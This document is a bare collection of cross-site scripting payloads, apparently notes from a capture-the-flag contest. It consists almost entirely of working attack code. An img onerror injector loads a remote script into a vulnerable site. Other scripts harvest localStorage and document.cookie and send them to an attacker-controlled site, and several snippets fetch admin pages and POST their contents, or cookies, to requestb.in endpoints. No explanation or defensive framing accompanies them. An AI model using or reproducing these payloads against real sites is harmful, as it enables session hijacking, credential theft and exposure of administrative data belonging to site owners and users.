insert below script into vulnerable site # change {base64 encoded url to javascript code} to base64 encoded url to javascript code

 <img src='a' onerror='var p=document.createElement(`script`);p.setAttribute(`src`,atob(`{base64 encoded url to javascript code}`));document.body.appendChild(p);' />

open below file to the internet.

 '''
  var i = 0;
  var result = "";
  for (i = 0; i < localStorage.length; i++) {
    var key = localStorage[localStorage.key(i)];
    result = result + ":::" + key;
  }
  result = result + ":::" + document.cookie;
  window.location = "http://{site we control}/aa?nkey=" + btoa(result);
  '''

---------------------

<script>
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", "/put.php");
xmlhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xmlhttp.send(JSON.stringify({id:"your_team_id", prelabel:"", "newlabel": localStorage.getItem('KEY'), "encpass": "02ed7dff48e11c2a49f655ae1eb1d952", iv:"128bd85c6e4b9ac8616cfbdd2a3dca6a"}));
</script>

----------------------
var xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET","/admin/show.php",false);
xmlhttp.send();
r=xmlhttp.responseText;
xmlhttp.responseText;
xmlhttp.open("POST","http://requestb.in/xxxx",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("vv="+escape(r));'

------------------------

xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET","/admin/server_info.php",false);
xmlhttp.send();
r=xmlhttp.responseText;
xmlhttp.responseText;
xmlhttp.open("POST","http://requestb.in/xxxx",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("vv="+escape(r));



------------------------
<script>
var xmlhttp = new XMLHttpRequest();
xmlhttp.open("POST", "http://requestb.in/1jrh00h1");
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send(document.cookie);
</script>

<script>
xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET","/admin/show.php",false);
xmlhttp.send();
r=xmlhttp.responseText;
xmlhttp.responseText;
xmlhttp.open("POST","http://requestb.in/xxxx",false);
xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xmlhttp.send("vv="+escape(r));
</script>

<script language= "JavaScript">document.location="http://requestb.in/1jrh00h1?cookie=" + document.cookie;document.location="http://requestb.in/1jrh00h1"</script>
